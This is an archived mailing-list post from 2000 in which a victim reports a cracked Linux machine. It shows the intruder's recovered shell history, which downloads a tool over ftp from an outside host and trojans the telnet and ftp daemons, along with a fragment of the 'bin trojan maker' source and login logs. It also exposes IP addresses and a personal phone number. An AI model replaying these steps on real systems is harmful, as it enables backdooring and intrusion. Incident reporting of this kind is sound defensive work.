Security Incidents mailing list archives
Re: succesful crack
From: icon94 () HOTMAIL COM (icon xxeti)
Date: Thu, 17 Feb 2000 22:09:03 GMT
Welcome to the club. Some sort of trend going on here
From: Bob Lockie <bjlockie () NORTELNETWORKS COM>
Reply-To: Bob Lockie <bjlockie () nortelnetworks com>
To: INCIDENTS () SECURITYFOCUS COM
Subject: succesful crack
Date: Tue, 15 Feb 2000 14:59:24 -0500
rjlockie () home net
(613) 765-5409
My box (24.112.89.219) was cracked.
The attack originated from 24.11.98.152 (c505000-a.blfld1.ct.home.com).
It could be this machine was also cracked and it was used as a launching
point.
Please contact the owner and have a talk with them.
The owner should definitely not offer anonymous ftp service.
A few things were left on my system.
drwxr-xr-x 2 root root 1024 Feb 13 22:03 ADMROCKS
I have no /etc/host.allow or /etc/hosts.deny files anymore.
This was in /tmp/,bash_history.
ftp 24.11.98.152
tar -xvf btm.tar
make
./btm /usr/sbin/in.telnetd
./btm /usr/sbin/in.ftpd
rm -rf btm.tar
The following source:
/* bin trojan maker */
#include "btm.h"
#define BTM_VER "btm v1.5"
int options=0;
void usage(char* progname)
{
printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u
compiler]"
" [-o compiler options] target [trojan
source]\n",progname);
printf("in trojan source, the trojan function must be:\n");
printf(" "TROJAN_FCT"(char** argv,char** envp)\n");
printf("\n");
printf("-d: debug mode\n");
printf("-c: don't trojan, just put the C file on stdout\n");
printf("-l max: max number of char in a line of the C file\n");
printf("-v: display version\n");
printf("-u compiler: use this compiler\n");
printf("-o options: options for compiler\n");
printf("-n: no save for target file\n");
printf("-e: echo commands\n");
printf("-m comments: put comments in btmized file\n");
printf("\n");
exit(0);
}
int getdirname(char* dirname,char* filename,size_t dirname_size)
{
if (!filename) return -1;
if (filename[0]=='/') {
strncpy(dirname,filename,dirname_size);
*(((char*)strrchr(dirname,'/'))+1)=0;
}
else {
if (!getcwd(dirname,dirname_size)) {
perror("getcwd");
return -1;
}
}
return 0;
}
/var/log/secure
Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by
(uid=0
)
Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by
tek(uid=5
000)
Bob Lockie
bjlockie () nortelnetworks com
Live long and prosper.
______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
Current thread:
- Re: succesful crack icon xxeti (Feb 17)
